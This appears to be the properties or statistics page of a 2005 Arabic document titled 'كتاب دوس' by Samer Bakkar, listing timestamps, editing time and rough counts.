عدد الأحرف: 


كتاب دوس 


Samer Bakkar 


PM 1:07 2005/27/9 
294 

AM 6:46 2005/16/10 
Samer Bakkar 

1 دقائق 
AM 7:02 2005/16/10‏ 


62 
4 (تقريبا) 
7 (تقريبا) 


